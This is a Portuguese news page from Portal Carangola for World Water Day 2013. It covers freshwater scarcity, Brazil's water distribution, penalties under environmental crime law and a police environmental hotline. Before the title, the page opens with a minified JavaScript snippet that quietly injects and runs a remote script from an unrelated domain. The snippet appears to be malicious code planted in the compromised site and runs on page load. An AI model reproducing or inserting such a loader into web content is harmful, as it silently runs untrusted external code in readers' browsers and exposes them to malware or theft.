;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); 2013 Ano Internacional da Cooperação da Água - 22 de março Dia Mundial da Água. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

2013 Ano Internacional da Cooperação da Água – 22 de março Dia Mundial da Água.

agua             Aproximadamente dois terços da superfície terrestre é coberta por água, onde 97,6% encontra-se nos oceanos, sendo imprópria para o consumo humano. A água doce corresponde a 2,4% e a maior parte concentra-se nos pólos em forma de gelo, restando apenas 0,02% distribuídas nos rios, lagos e reservas subterrâneas.

            De toda a água doce disponível no mundo, estima-se que 50% está imprópria para o consumo. A degradação dos rios através do lançamento de esgotos domésticos, produtos químicos e assoreamentos, dificultam a utilização de suas águas.

            O Brasil é um país privilegiado! Possui aproximadamente 12% de toda a água doce do planeta, contudo sua distribuição é desigual, pois a maior parte se concentra na região amazônica, a área menos populosa.

           

 Em nosso país, causar poluição é crime!

 

            Lei nº 9.605/98 – Crimes ambientais

            Artigo54 – Causar poluição de qualquer natureza em níveis tais que resultem ou possam resultar em danos à saúde humana, ou que provoquem a mortandade de animais ou a destruição significativa da flora.

 

            Pena: Reclusão de uma a quatro anos e multa.

 

           

 

            Além do crime, poluir ou causar dano a recurso hídrico pode ser também infração administrativa pela Norma Estadual (Estado de Minas Gerais) e resultar em multa de R$ 5.000,00 a R$ 500.000,00, e ainda, cumulativamente penas de suspensão ou embargo de atividade ou multa diária.

 

 

 

A água é o nosso maior patrimônio, é dever de todos protegê-la!

 

 

Polícia Militar de Minas Gerais

4ª RPM/4ª Cia PM Ind MAT/5º Pel PM Esp MAmb

 

6º Grupamento de Polícia Militar de Meio Ambiente – Carangola/MG

 

181 Disque denúncia



[secvitrine/agua/117203]

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.